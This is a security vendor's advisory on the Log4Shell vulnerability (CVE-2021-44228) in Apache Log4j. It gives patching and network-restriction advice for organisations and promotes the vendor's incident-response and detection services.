A widespread, critical and easy-to-exploit vulnerability that has been discovered in Apache Log4j, a commonly used logging tool. MITRE has designated this vulnerability as CVE-2021-44228 and has given it the highest possible CVSS severity scroe of 10.0.
Below you can find Group-IB’s recommendations to mitigate this vulnerability and protect your organization.
What is the Log4Shell vulnerability?
A deserialization vulnerability in the Log4j logging tool, used to aid in debugging and metrics, has been discovered and requires immediate attention from security teams in organizations of every size and industry. Log4j is not a distinct application, it is a software component and is available in a variety of different services, this makes identifying and patching vulnerable versions of Log4j within an organization challenging. Furthermore, even if publicly accessible applications are not vulnerable, logging services downstream can be compromised by the exploit.
To date most known Log4j attacks have been automated and exploratory, however it is believed that ransomware gang’s, such as Conti, may have begun using the exploit for lateral movement.
Organizations are urged to perform mitigating actions as soon as possible to prevent:
- Disruption to operations
- Reputational damage
- Response and recovery costs
- Disclosure announcements if there is a breach
Group-IB’s recommendations
Remediation:
- Update and patch impacted applications where possible within 24 hours.
Workarounds and mitigations:
- Prohibit Internet network communication for important information systems by direct TCP/UDP and HTTP protocols. It is a primary way to deliver payload to the system. Prohibiting communication disables the full killchain, even if an attacker is able to exploit the initial stage by poisoning the logs.
- Restrict DNS resolution on important systems, potentially use static host files. While such systems can have TCP/UDP/HTTP protocols already disabled, sometimes attackers can leverage the DNS exfiltration technique to get access to critical segments.
- Examine components lists of the products and services used in the organization to detect Log4j Library usage. Update the library
- Examine your logs for exploitation traces with Yara rules. If something is found, examine successful network communications with the domain names listed in the traces.
Group-IB offers a range of products and services to help organizations that need assistance:
| Use case | Group-IB’s product/service |
|---|---|
| Find out if vulnerabilities have been already exploited into attack vector | Group-IB Compromise Assessment |
| Ensure that vulnerabilities are mitigated and do not pose a threat anymore | Group-IB Security Assessment and Testing |
| Detects attempts to run the exploit and compromise organization’s network | Group-IB Managed Extended Detection and Response |
| Identify post-exploitation techniques applied by attackers | Group-IB Managed Extended Detection and Response |
| Get rapid response to stop the attack and conduct a detailed analysis of the incident | Group-IB Incident Response Retainer |
Further information
Group-IB products, services and infrastructure have been verified as safe and not vulnerable to this exploit.
Useful links and references:
- CISA vulnerability guidance
- NCSC board guidance
- NIST vulnerability database
- MITRE vulnerability information
- Apache Log4j support
Group-IB Managed Extended Detection and Response
Detect and disrupt cyber threats with unprecedented speed and accuracy to reduce your cyber risk
